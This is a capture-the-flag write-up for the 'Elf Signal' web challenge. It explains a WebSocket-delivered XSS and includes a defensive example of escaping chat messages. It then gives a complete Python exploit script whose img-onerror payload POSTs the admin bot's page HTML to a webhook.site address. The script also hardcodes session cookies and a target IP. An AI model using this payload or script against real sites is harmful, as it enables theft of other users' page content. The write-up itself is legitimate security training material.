Challenge
Category: WEB
Before disappearing, our intelligence suggests that the missing elf was using a covert internal application called Elf Signal for communication. We need assistance in investigating the application to uncover the identities involved and the nature of their conversations.
challenge code: elf-signal.zip
Solution
Reconnaissance
This challenge seems to be an XSS challenge. We can inject <img src=x onerror=alert(1)>
in a chat and get it to execute. But it is not stored XSS, since the vulnerability is only triggered when a message is received over the WebSocket connection and rendered by the client.
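The bug the reconnaissance describes, rendering the data field of an incoming WebSocket message as HTML, is shown below beside the fix. This is an added example written for this write-up, not code from the challenge or the Elf Signal application; the message shape follows the {"type","chatId","data"} JSON that the exploit script sends, while the function names and the sample chat id are assumptions.

```javascript
// Added example (not from the write-up or the Elf Signal app): contrasts the
// rendering pattern that makes a WebSocket chat client vulnerable to XSS with a
// hardened renderer. The {type, chatId, data} shape mirrors the write-up's
// send_message(); function names and the sample chat id are assumptions.

// Minimal HTML escaping for untrusted text placed inside an element body or
// a double-quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: markup is built by concatenation and would then be
// assigned to chatLog.innerHTML. Any tag in msg.data is parsed by the browser,
// so an <img onerror=...> from the sender runs in the viewer's session,
// which is exactly how the admin bot gets hit when it opens the room.
function renderVulnerable(msg) {
  return `<div class="msg" data-chat="${msg.chatId}">${msg.data}</div>`;
}

// Hardened pattern: the untrusted text is escaped before it touches markup.
// In a real client prefer document.createElement plus textContent; the
// string-based form here is what can be checked offline without a DOM.
function renderSafe(msg) {
  return `<div class="msg" data-chat="${escapeHtml(msg.chatId)}">${escapeHtml(msg.data)}</div>`;
}

// Handler for a raw WebSocket frame: parse, validate the shape, render safely.
// Returns null for frames that are not well-formed chat messages.
function onSocketMessage(rawFrame) {
  let msg;
  try {
    msg = JSON.parse(rawFrame);
  } catch {
    return null;
  }
  if (!msg || msg.type !== "message" || typeof msg.data !== "string") return null;
  return renderSafe(msg);
}

// Constructed sample frame (chat id is a placeholder) carrying the same kind
// of payload the write-up injects.
const sampleFrame = JSON.stringify({
  type: "message",
  chatId: "0123456789abcdef0123456789abcdef",
  data: '<img src=x onerror="alert(1)">',
});

// Stand-alone demonstration: the vulnerable renderer keeps the tag intact,
// the safe renderer turns it into inert text.
console.log("vulnerable:", renderVulnerable(JSON.parse(sampleFrame)));
console.log("safe:      ", onSocketMessage(sampleFrame));
```

The fix belongs on the client side regardless of any server-side filtering: the server relays whatever it receives over the socket, and the admin bot's browser is the one that parses the markup, so escaping (or using textContent) at the point of rendering is what closes the hole.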
Exploit
When reporting a chat room to the admin, they watch the page for 5 seconds. We can use this window to send a message to the chat room while the admin is watching, which makes the admin's browser execute our code.
I realized this almost immediately, but spent way too much time trying to open a new WebSocket connection and list the chats with my XSS. I managed to do this on myself, but never on the admin… Then I realised I could get the chat room id from the DOM (document.body.innerHTML), since the admin had already loaded it.
Final exploit
import websocket
import json
import requests
import time
import threading

# local
# header = {
#     "Cookie": "session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImI2ZDIxMjM1LWM1OWItNGY5Ny1iYTcwLTlmOTRmOTJkODUwMyIsImlhdCI6MTcwMjIxMzQ5OX0.o6X17cbzF3-kVqhtxv3xTZObHy1N0NazqDn7SWomdaw"
# }
# remote
header = {
    "Cookie": "session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImIxMGZmZTBhLWRmY2QtNGMwOC1iNzg0LTYyZDY5MmQ3N2U4MiIsImlhdCI6MTcwMjIxNTg5Mn0.r446xCckQibAc07iFSu8sgd6XMhSOHtzBedfdHIzlvg"
}

local = "localhost:1339"
remote = "51.120.248.76:1339"
website = remote

def new_chat(ws):
    # Ask the server for a fresh chat room and return its id
    ws.send(json.dumps({"type": "new"}))
    chat_id = json.loads(ws.recv())["chatId"]
    return chat_id

def send_message(ws, chat_id, message):
    # Messages are relayed as-is to everyone viewing the room
    ws.send(json.dumps({"type": "message", "chatId": chat_id, "data": message}))

def report_to_admin(chat_id):
    # Makes the admin bot open the chat room (it stays on the page for 5 seconds)
    print("reporting")
    resp = requests.post(f"http://{website}/bot", headers=header, json={"chatId": chat_id})
    print(resp.text)

def delayed_send(ws, chat_id, xss_message):
    # Wait until the admin is on the page, then deliver the payload over the socket
    time.sleep(1.5)
    send_message(ws, chat_id, xss_message)
    print("sent")

# Payload: exfiltrate the admin's DOM (which contains the loaded chat room id)
xss_message1 = """<img src=x onerror="fetch('https://webhook.site/cae6900b-17e1-4d72-83c1-6c7aea24186e/', { method: 'POST', body: document.body.innerHTML, mode: 'no-cors' });"/>"""

ws = websocket.create_connection(f"ws://{website}", header=header)
chat_id = new_chat(ws)
print(chat_id)
threading.Thread(target=report_to_admin, args=(chat_id,)).start()
threading.Thread(target=delayed_send, args=(ws, chat_id, xss_message1)).start()
This worked and I got the chat room id 2e8e8e31a9f7f0768c4e79ea211b8d15.
Going to the chat room we find a lot of sus messages. It looked like the same message format as the first challenge, so I put the messages in there and decoded them. (In hindsight, after solving the other challenge, I realised that the messages were just Python-encoded strings.)
"Greetings, Sir! I've been devising a plan to sprinkle some enchantment into this holiday season."
'Ah, salutations, little mischief! What manner of festive trickery do you propose?'
"How about a delightful switcheroo? We could sneakily swap out some ornaments on the children's Christmas tree with our own playful creations!"
'Oh, the gleeful havoc that would ensue! Imagine their astonishment finding elf-sized stockings or Grinchy-green baubles in place of their usual adornments! Absolutely devious!'
'Ho ho ho! Their puzzlement turning into holiday delight! But tell me, when do we set our mischievous plan in motion?'
"Next sunday night, beneath the shimmering canopy of stars. It'll be a splendid sight, bringing a touch of magic to their celebrations!"
'A covert escapade, elf?'
'Our little secret, Sir. Let the jingle bells chime in harmony with our laughter!'
"Let's use the code OMEGAPOINT{s1r_gr1nch_w1ll_b3_m4k1ng_4_r3turn_th1s_chr1stm4s} as our signal to commence our antics at that time."
"Ah, the code it is! Join in, ignite new gleeful laughs, everyone! This will be the most joyous prank they've ever encountered!"
flag: OMEGAPOINT{s1r_gr1nch_w1ll_b3_m4k1ng_4_r3turn_th1s_chr1stm4s}